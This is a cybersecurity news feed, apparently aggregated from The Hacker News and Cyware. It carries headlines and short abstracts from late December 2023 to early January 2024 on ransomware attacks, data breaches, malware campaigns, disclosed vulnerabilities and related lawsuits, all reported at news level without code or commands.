The U.S. Department of Justice (DoJ) on Tuesday said it reached a settlement with VoIP service provider XCast over allegations that it facilitated illegal telemarketing campaigns since at least January 2018, in contravention of the Telemarketing Sales Rule ( TSR ). In addition to prohibiting the company from violating the law, the stipulated order requires it to meet other compliance measures, including establishing a process for screening its customers and calling for potential illegal telemarketing. The order, which also imposes a $10 million civil penalty judgment, has been suspended due to XCast's inability to pay. "XCast provided VoIP services that transmitted billions of illegal robocalls to American consumers, including scam calls fraudulently claiming to be from government agencies," the DoJ said in a press release. These calls delivered prerecorded marketing messages, most of which were sent to numbers listed on the National Do Not Call Registry. To make matters worse,

The Hacker News

January 3, 2024 – Ransomware

Ban on Ransomware Payments? The Alternative Isn’t Working Full Text

Abstract

Ransomware attacks in the US reached record levels in 2023, targeting hospitals, schools, government organizations, and private-sector businesses, costing victims an average of $1.5 million to rectify.

Cyware

January 3, 2024 – Breach

Defunct Ambulance Service Data Breach Impacts Nearly One Million People Full Text

Abstract

Fallon Ambulance Services, a subsidiary of Transformative Healthcare, was targeted in a ransomware attack that exposed the personal information of nearly a million people. The attack occurred in February 2023 and was discovered in April 2023.

Cyware

January 2, 2024 – Breach

Inc Ransom Ransomware Gang Claims to Have Breached Xerox Corp Full Text

Abstract

The Inc Ransom ransomware group has published several documents, including emails and an invoice, as proof of the hack. It is unclear how much data has been stolen from Xerox Corp.

Cyware

January 02, 2024 – Solution

The Definitive Enterprise Browser Buyer’s Guide Full Text

Abstract

Security stakeholders have come to realize that the prominent role the browser has in the modern corporate environment requires a re-evaluation of how it is managed and protected. While not long-ago web-borne risks were still addressed by a patchwork of endpoint, network, and cloud solutions, it is now clear that the partial protection these solutions provided is no longer sufficient. Therefore, more and more security teams are now turning to the emerging category of purpose-built enterprise browsers as the answer to the browser's security challenges. However, as this security solution category is still relatively new, there is not yet an established set of browser security best practices, nor common evaluation criteria. LayerX, the User-First Enterprise Browser Extension, is addressing security teams' need with the downable Enterprise Browser Buyer's Guide , which guides its readers through the essentials of choosing the best solution and provides them with an actionable

The Hacker News

January 2, 2024 – Ransomware

Zeppelin2 Ransomware Builder for Sale on Dark Web Full Text

Abstract

A user on an underground forum is promoting the sale of Zeppelin2 ransomware, offering its source code and a cracked version of its builder tool. Zeppelin2 has been used since 2019, targeting various sectors including healthcare and technology.

Cyware

January 02, 2024 – Policy and Law

Google Settles $5 Billion Privacy Lawsuit Over Tracking Users in ‘Incognito Mode’ Full Text

Abstract

Google has agreed to settle a lawsuit filed in June 2020 that alleged that the company misled users by tracking their surfing activity who thought that their internet use remained private when using the "incognito" or "private" mode on web browsers. The class-action lawsuit sought at least $5 billion in damages. The settlement terms were not disclosed. The plaintiffs had alleged that Google violated federal wiretap laws and tracked users' activity using Google Analytics to collect information when in private mode. They said this allowed the company to collect an "unaccountable trove of information" about users who assumed they had taken adequate steps to protect their privacy online. Google subsequently attempted to get the lawsuit dismissed, pointing out the message it displayed when users turned on Chrome's incognito mode, which informs users that their activity might still be visible to websites you visit, employer or school, or their internet service provider. It's w

The Hacker News

January 2, 2024 – Attack

Cactus Ransomware Gang Hit the Swedish Retail and Grocery Provider Coop Full Text

Abstract

The Cactus ransomware group has claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden. They are threatening to release a large amount of personal information.

Cyware

January 2, 2024 – Attack

Hackers Attack UK’s Nuclear Waste Services Through LinkedIn Full Text

Abstract

The United Kingdom's Radioactive Waste Management (RWM) company recently experienced a cyberattack attempt through LinkedIn. Although the attack was unsuccessful, concerns have been raised about the security of critical nuclear infrastructure.

Cyware

January 2, 2024 – Breach

Pro-Palestinian Operation Claims Dozens of Data Breaches Against Israeli Firms Full Text

Abstract

Pro-Palestinian hackers belonging to the group Cyber Toufan have successfully breached and leaked data from numerous Israeli entities, including foreign companies doing business with Israel.

Cyware

January 01, 2024 – Malware

New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections Full Text

Abstract

Security researchers have detailed a new variant of a dynamic link library ( DLL ) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11. The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News. In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past . DLL search order hijacking , as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escal

The Hacker News

January 01, 2024 – Vulnerabilities

New Terrapin Flaw Could Let Attackers Downgrade SSH Protocol Security Full Text

Abstract

Security researchers from Ruhr University Bochum have discovered a vulnerability in the Secure Shell ( SSH ) cryptographic network protocol that could allow an attacker to downgrade the connection's security by breaking the integrity of the secure channel. Called Terrapin ( CVE-2023-48795 , CVSS score: 5.9), the exploit has been described as the "first ever practically exploitable prefix truncation attack." "By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it," researchers Fabian Bäumer, Marcus Brinkmann, and Jörg Schwenk said . SSH is a method for securely sending commands to a computer over an unsecured network. It relies on cryptography to authenticate and encrypt connections between devices. This is accomplished by means of a handshake in which a client and server agree up

The Hacker News

January 01, 2024 – Malware

New JinxLoader Targeting Users with Formbook and XLoader Malware Full Text

Abstract

A new Go-based malware loader called JinxLoader is being used by threat actors to deliver next-stage payloads such as Formbook and its successor XLoader . The disclosure comes from cybersecurity firms Palo Alto Networks Unit 42 and Symantec, both of which highlighted multi-step attack sequences that led to the deployment of JinxLoader through phishing attacks. "The malware pays homage to League of Legends character Jinx , featuring the character on its ad poster and [command-and-control] login panel," Symantec said . "JinxLoader's primary function is straightforward – loading malware." Unit 42 revealed in late November 2023 that the malware service was first advertised on hackforums[.]net on April 30, 2023, for $60 a month, $120 a year, or for a lifetime fee of $200. The attacks begin with phishing emails impersonating Abu Dhabi National Oil Company (ADNOC), urging recipients to open password-protected RAR archive attachments that, upon opening,

The Hacker News

December 30, 2023 – Malware

Info-Stealing Malware Now Includes Google Session Hijacking Full Text

Abstract

Multiple malware-as-a-service info stealers now have the ability to manipulate authentication tokens to gain persistent access to a victim's Google account, even after the user has reset their password.

Cyware

December 30, 2023 – Phishing

Beware: Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks Full Text

Abstract

Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets. "These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said . A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a "scam-as-a-service" offering by charging a percentage of the stolen amount, typically 20% or 30% , from its collaborators in return for providing wallet-draining scripts and other services. In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims sinc

The Hacker News

December 29, 2023 – Outage

Computer Systems at Massachusetts-Based Anna Jaques Hospital Compromised After Cyberattack Full Text

Abstract

Anna Jaques Hospital's health record system was shut down due to a cyberattack, causing delays in receiving services and diverting ambulance arrivals. The hospital is working with cybersecurity professionals to investigate the attack.

Cyware

December 29, 2023 – Attack

Albanian Parliament and One Albania Telecom Hit by Cyber Attacks Full Text

Abstract

The Assembly of the Republic of Albania and telecom company One Albania have been targeted by cyber attacks, the country's National Authority for Electronic Certification and Cyber Security (AKCESK) revealed this week. "These infrastructures, under the legislation in force, are not currently classified as critical or important information infrastructure," AKCESK said . One Albania, which has nearly 1.5 million subscribers, said in a Facebook post on December 25 that it had handled the security incident without any issues and that its services, including mobile, landline, and IPTV, remained unaffected. AKCESK further noted that the intrusions did not originate from Albanian IP addresses, adding it managed to "identify potential cases in real-time." The agency also said that it has been focusing its efforts on identifying the source of the attacks, recovering compromised systems, and implementing security measures to prevent such incidents from happening again in the future.

The Hacker News

December 29, 2023 – Privacy

With Car Privacy Concerns Rising, Automakers May Be on Road to Regulation Full Text

Abstract

Regulators, particularly the California Privacy Protection Agency and the Federal Trade Commission, are starting to investigate and potentially take action against connected vehicle manufacturers for privacy violations.

Cyware

December 29, 2023 – Government

CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK Full Text

Abstract

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information. The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document. However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the "search-ms:" URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE. MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol. The attacks further pave the way for the deployment of a

The Hacker News

December 29, 2023 – Policy and Law

Google to Settle Class Action Lawsuit Alleging Incognito Mode Does Not Protect User Privacy Full Text

Abstract

Google has reached a preliminary settlement in a class-action lawsuit accusing the company of deceiving users about their privacy while using the Incognito mode. The settlement comes after a nearly four-year legal battle.

Cyware

December 29, 2023 – Phishing

Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks Full Text

Abstract

Nation-state actors affiliated to North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines. South Korea-based cybersecurity company AhnLab attributed the activity to an advanced persistent threat group known as Kimsuky . "A notable point about attacks that use AppleSeed is that similar methods of attack have been used for many years with no significant changes to the malware that are used together," the AhnLab Security Emergency Response Center (ASEC) said in an analysis published Thursday. Kimsuky , active for over a decade, is known for its targeting of a wide range of entities in South Korea, before expanding its focus to include other geographies in 2017. It was sanctioned by the U.S. government late last month for amassing intelligence to support North Korea's strategic objectives. The threat actor's espionage campaigns are realized th

The Hacker News

December 29, 2023 – Outage

Update: Operational Halt at First American Financial Corporation, Subsidiary After Cyberattack Full Text

Abstract

The company is working to restore its operations and has notified regulatory authorities. Despite the disruption, the company is still able to close loans and accept payments.

Cyware

December 29, 2023 – General

Do the Casino Ransomware Attacks Make the Case to Pay? Full Text

Abstract

Experts caution that the decision to pay or not pay depends on various factors, including the type of data compromised, the availability of backups, the financial impact on the organization, and the sector in which the company operates.

Cyware

December 29, 2023 – Vulnerabilities

Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks Full Text

Abstract

Microsoft on Thursday said it's once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware. "The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution," the Microsoft Threat Intelligence team said . It further noted that several cybercriminals are offering a malware kit for sale as a service that leverages the MSIX file format and ms-appinstaller protocol handler. The changes have gone into effect in App Installer version 1.21.3421.0 or higher. The attacks take the form of signed malicious MSIX application packages that are distributed via Microsoft Teams or malicious advertisements for legitimate popular software on search engines like Google. At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mi

The Hacker News

December 28, 2023 – Outage

Trinidad and Tobago Social Security Agency Discloses Post-Christmas Ransomware Attack Full Text

Abstract

The National Insurance Board in Trinidad and Tobago has been hit by a ransomware attack, leading to the closure of its offices and limiting its operations for an extended period.

Cyware

December 28, 2023 – Vulnerabilities

Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service Full Text

Abstract

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. "An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster," the company said as part of an advisory released on December 14, 2023. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out "data theft, deploy malicious pods, and disrupt the cluster's operations." There is no evidence that the issue has been exploited in the wild. It has been addressed in the following versions of Google Kubernetes Engine (GKE) and Anthos Service Mesh (ASM) - 1.25.16-gke.1020000 1.26.10-gke.1235000 1.27.7-gke.1293000 1.28.4-gke.1083000 1.17.8-asm.8 1.18.

The Hacker News

December 28, 2023 – Attack

Albanian Parliament, Telecom Company Hit by Cyberattacks Full Text

Abstract

The Albanian parliament and a telecom company were targeted by cyberattacks originating from outside Albania. The attacks, which attempted to interfere with infrastructure and delete data, have not been attributed to a specific threat actor.

Cyware

December 28, 2023 – Attack

Most Sophisticated iPhone Hack Ever Exploited Apple’s Hidden Hardware Feature Full Text

Abstract

The Operation Triangulation spyware attacks targeting Apple iOS devices leveraged never-before-seen exploits that made it possible to even bypass pivotal hardware-based security protections erected by the company. Russian cybersecurity firm Kaspersky, which discovered the campaign at the beginning of 2023 after becoming one of the targets, described it as the "most sophisticated attack chain" it has ever observed to date. The campaign is believed to have been active since 2019. The exploitation activity involved the use of four zero-day flaws that were fashioned into a chain to obtain an unprecedented level of access and backdoor target devices running iOS versions up to iOS 16.2 with the ultimate goal of gathering sensitive information. The starting point of the zero-click attack is an iMessage bearing a malicious attachment, which is automatically processed sans any user interaction to ultimately obtain elevated permissions and deploy a spyware module. Specific

The Hacker News

December 28, 2023 – Malware

Four-Year Campaign Backdoored Iphones Using Undocumented Hardware Function Full Text

Abstract

The secret hardware function targeted by the attackers allowed them to bypass advanced memory protections, enabling post-exploitation techniques and compromising system integrity.

Cyware

December 28, 2023 – Malware

New Rugmi Malware Loader Surges with Hundreds of Daily Detections Full Text

Abstract

A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms . Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi . "This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single digit daily numbers to hundreds per day. Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expen

The Hacker News

December 28, 2023 – Vulnerabilities

Three Main Tactics Attackers Use to Bypass MFA Full Text

Abstract

SE Labs has warned that multi-factor authentication (MFA) is not foolproof and can be bypassed by attackers using old-school methods such as social engineering, malware, and phishing.

Cyware

December 28, 2023 – Insider Threat

How to Incorporate Human-Centric Security Full Text

Abstract

Companies need to shift their focus from solely addressing threats to proactively mitigating risks by analyzing behaviors and implementing insider risk management solutions.

Cyware

December 27, 2023 – Vulnerabilities

Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack Full Text

Abstract

A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467 , resides in the login functionality and is the result of an incomplete patch for another critical vulnerability ( CVE-2023-49070 , CVSS score: 9.8) that was released earlier this month. "The security measures taken to patch CVE-2023-49070 left the root issue intact and therefore the authentication bypass was still present," the SonicWall Capture Labs threat research team, which discovered the bug, said in a statement shared with The Hacker News. CVE-2023-49070 refers to a pre-authenticated remote code execution flaw impacting versions prior to 18.12.10 that, when successfully exploited, could allow threat actors to gain full control over the server and siphon sensitive data. It is caused due to a deprecated XML-RPC component within Apache

The Hacker News

December 27, 2023 – Attack

Chinese Hackers Exploited New Zero-Day in Barracuda’s ESG Appliances Full Text

Abstract

Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a "limited number" of devices. Tracked as CVE-2023-7102 , the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library named Spreadsheet::ParseExcel that's used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware. The company attributed the activity to a threat actor tracked by Google-owned Mandiant as UNC4841 , which was previously linked to the active exploitation of another zero-day in Barracuda devices (CVE-2023-2868, CVSS score: 9.8) earlier this year. Successful exploitation of the new flaw is accomplished by means of a specially crafted Microsoft Excel email attachment. This is followed by the deployment of new variants of known implants called SEASPY and SALTWATER that are equipped to offer persistence and comman

The Hacker News

December 27, 2023 – Malware

New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices Full Text

Abstract

A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices. Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives. It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill. The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said . The cybersecurity firm said it identified 25 apps that come with this active thr

The Hacker News

December 26, 2023 – Vulnerabilities

Ubuntu Security Updates Fixed Vim Vulnerabilities Full Text

Abstract

The vulnerabilities range from denial of service risks to arbitrary code execution possibilities. It emphasizes the importance of regularly updating Vim and applying security patches to mitigate these risks.

Cyware

December 26, 2023 – Malware

Carbanak Banking Malware Resurfaces with New Ransomware Tactics Full Text

Abstract

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software." Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak , detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate . In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to

The Hacker News

December 26, 2023 – Breach

Mobile Virtual Network Operator Mint Mobile Discloses a Data Breach Full Text

Abstract

The breach exposed customers' names, phone numbers, email addresses, SIM serial numbers, IMEI numbers, and service plan information. Importantly, financial data and passwords were not exposed in the breach.

Cyware

December 26, 2023 – Business

Mend.io Acquires Cyber Startup Atom Security Full Text

Abstract

The integration of Atom Security's technology into Mend.io's product line is expected to enhance coverage and reduce the number of irrelevant findings in code vulnerabilities.

Cyware

December 26, 2023 – Breach

Video Game Giant Ubisoft Investigates Reports of a Data Breach Full Text

Abstract

On December 20, an unknown threat actor had access to Ubisoft's infrastructure for 48 hours. The attackers attempted to steal user data from the game R6 Siege but were unsuccessful.

Cyware

December 26, 2023 – Malware

Stealth Android Backdoor Xamalicious Found Actively Infecting Devices Full Text

Abstract

The Xamalicious backdoor, implemented with Xamarin, targets Android devices by gaining accessibility privileges and communicating with a C2 server to download a second-stage payload, potentially enabling fraudulent actions without user consent.

Cyware

December 26, 2023 – Malware

Nim-based Malware Distributed Using Microsoft Word Docs Impersonating the Nepali Government Full Text

Abstract

The Nim-based backdoor communicates with command and control servers, evades analysis tools, and establishes persistence on the compromised machine through startup folders and scheduled tasks.

Cyware

December 26, 2023 – Phishing

The Rising Threat of Phishing Attacks with Crypto Drainers Full Text

Abstract

The "Angel Drainer" phishing group is notorious for draining cryptocurrency wallets through sophisticated schemes, charging a percentage of the stolen amount from hackers.

Cyware

December 25, 2023 – Phishing

Cloud Atlas’ Spear-Phishing Attacks Target Russian Agro and Research Companies Full Text

Abstract

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia. In December 2022, Check Point and Positive Technologies detailed multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor referred to as PowerShower as well as DLL payloads capable of communicating with an actor-controlled server. The starting point is a phishing message bearing a lure document that exploits CVE-2017-11882 , a six-year-ol

The Hacker News

December 24, 2023 – Policy and Law

British LAPSUS$ Teen Members Sentenced for High-Profile Attacks Full Text

Abstract

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies. Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported . Kurtaj, who is autistic, was deemed unfit to stand trial. Another LAPSUS$ member, a 17-year-old unnamed minor, was sentenced to an 18-month-long Youth Rehabilitation Order, including a three-month intensive supervision and surveillance requirement. He was found guilty of two counts of fraud, two Computer Misuse Act offenses, and one count of blackmail. Both defendants were initially arrested in January 2022, and then released under investigation. They were re-arrested in March 2022. While Kurtaj was later granted bail, he continued to attack various companies until he was arrested again in September. The attack sp

The Hacker News

December 23, 2023 – Vulnerabilities

ESET Fixed a High-Severity Bug in the Secure Traffic Scanning Feature of Several Products Full Text

Abstract

The vulnerability was due to improper validation of server certificates, allowing browsers to trust sites with certificates signed with outdated algorithms. ESET has released security patches and is not aware of any attacks exploiting this flaw.

Cyware

December 23, 2023 – Breach

Real Estate Agency Exposes Details of 690K Customers in Dubai Full Text

Abstract

The leaked data included personal information such as names, emails, phone numbers, and scanned copies of receipts, checks, contracts, and IDs, increasing the likelihood of targeted scams and unauthorized access to sensitive accounts.

Cyware

December 23, 2023 – Malware

Bandook - A Persistent Threat That Keeps Evolving Full Text

Abstract

Bandook malware, a remote access trojan, has evolved with a new variant that uses a PDF file to distribute its payload and injects it into msinfo32.exe, allowing remote attackers to gain control of infected systems.

Cyware

December 23, 2023 – Attack

Ukrainian Hackers Claim Attack on Popular Russian CRM Provider Full Text

Abstract

A group of Ukrainian hackers known as the IT Army claimed responsibility for disrupting the operations of Bitrix24, a Russian provider of customer relationship management (CRM) services.

Cyware

December 23, 2023 – Policy and Law

Online Platform Carousell Violated Hong Kong Privacy Laws, Watchdog Finds Full Text

Abstract

The violation comes after the personal data of over 320,000 local users was discovered being sold on the dark web. Carousell reported the incident last year, attributing it to a loophole exploited by hackers in its system migration process.

Cyware

December 23, 2023 – Phishing

Cyber-Espionage Group Cloud Atlas Targets Russian Companies With War-Related Phishing Attacks Full Text

Abstract

The hacker group known as Cloud Atlas has recently targeted a Russian agro-industrial enterprise and a state-owned research company in an espionage campaign. The group, believed to be state-backed, primarily attacks Russia and surrounding countries.

Cyware

December 22, 2023 – Malware

Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft Full Text

Abstract

Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information. The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri. "As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said . "In this case, comments claim the code to be 'WordPress Cache Addons.'" Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site. Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel. "Since the only way to re

The Hacker News

December 22, 2023 – Malware

Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities Full Text

Abstract

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said . Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan. SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, an

The Hacker News

December 22, 2023 – Phishing

Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware Full Text

Abstract

A new phishing campaign is leveraging decoy Microsoft Word documents as bait to deliver a backdoor written in the Nim programming language . "Malware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers' unfamiliarity can hamper their investigation," Netskope researchers Ghanashyam Satpathy and Jan Michael Alcantara said . Nim-based malware has been a rarity in the threat landscape, although that has been slowly changing in recent years as attackers continue to either develop custom tools from scratch using the language or port existing versions of their nefarious programs to it. This has been demonstrated in the case of loaders such as NimzaLoader , Nimbda , IceXLoader , as well as ransomware families tracked under the names Dark Power and Kanti . The attack chain documented by Netskope begins with a phishing email containing a Word document attachment that, when opened, urges the recipi

The Hacker News

December 22, 2023

UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware Full Text

Abstract

The threat actor known as UAC-0099 has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE. "The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct said in a Thursday analysis. UAC-0099 was first documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2023, detailing its attacks against state organizations and media entities for espionage motives. The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of LONEPAGE , a Visual Basic Script (VBS) malware that's capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware. "During 2022-2023, the mentioned group received unauthorized remote access to several dozen computer

The Hacker News

December 22, 2023

Microsoft Warns of New ‘FalseFont’ Backdoor Targeting the Defense Sector Full Text

Abstract

Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont. The findings come from Microsoft, which is tracking the activity under its weather-themed moniker Peach Sandstorm (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten. "FalseFont is a custom backdoor with a wide range of functionalities that allow operators to remotely access an infected system, launch additional files, and send information to its [command-and-control] servers," the Microsoft Threat Intelligence team said on X (previously Twitter). The first recorded use of the implant was in early November 2023. The tech giant further said that the latest development aligns with previous activity from Peach Sandstorm and demonstrates a continued evolution of the threat actor's tradecraft. In a report published in September 2023, Microsoft linke

The Hacker News

December 22, 2023

Android Banking Trojan Chameleon can Now Bypass Any Biometric Authentication Full Text

Abstract

The Chameleon banking trojan has evolved with new advanced features, including the ability to bypass biometric prompts and display HTML pages for enabling Accessibility Services on Android 13, making it a potent threat to mobile banking security.

Cyware

December 21, 2023 – Vulnerabilities

Google Addressed a New Actively Exploited Chrome Zero-Day Full Text

Abstract

Google has released emergency updates to fix a zero-day vulnerability in the Chrome browser. The vulnerability, known as CVE-2023-7024, is a heap buffer overflow issue in WebRTC.

Cyware

December 21, 2023 – Privacy

Experts Detail Multi-Million Dollar Licensing Model of Predator Spyware Full Text

Abstract

A new analysis of the sophisticated commercial spyware called Predator has revealed that its ability to persist between reboots is offered as an "add-on feature" and that it depends on the licensing options opted by a customer. "In 2021, Predator spyware couldn't survive a reboot on the infected Android system (it had it on iOS)," Cisco Talos researchers Mike Gentile, Asheer Malhotra, and Vitor Ventura said in a report shared with The Hacker News. "However, by April 2022, that capability was being offered to their customers." Predator is the product of a consortium called the Intellexa Alliance, which includes Cytrox (subsequently acquired by WiSpear), Nexa Technologies, and Senpai Technologies. Both Cytrox and Intellexa were added to the Entity List by the U.S. in July 2023 for "trafficking in cyber exploits used to gain access to information systems." The latest findings come more than six months after the cybersecurity vendor detai

The Hacker News

December 21, 2023 – Policy and Law

Cyber Risk Strategies in Hot Seat as SEC Rules Go Live Full Text

Abstract

Companies are reassessing their incident response plans and determining the materiality of cyber incidents. The SEC aims to improve companies' preparedness to mitigate breaches and attacks.

Cyware

December 21, 2023 – Malware

Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication Full Text

Abstract

Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy. "Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Chameleon was previously documented by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks. The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation Offic

The Hacker News

December 21, 2023 – Attack

Indian Tech Giant HCL Investigating Ransomware Attack Full Text

Abstract

HCL Technologies has reported a ransomware attack on one of its projects in an isolated cloud environment. The company stated that the incident has had no impact on its overall network and that cybersecurity and data protection are top priorities.

Cyware

December 21, 2023 – Malware

New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide Full Text

Abstract

A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world. The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan. IBM Security Trusteer said it detected the campaign in March 2023. "Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said . Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's susp

The Hacker News

December 21, 2023 – Attack

Russian Water Utility Rosvodokanal Hit by Disruptive Cyberattack From Blackjack Group Full Text

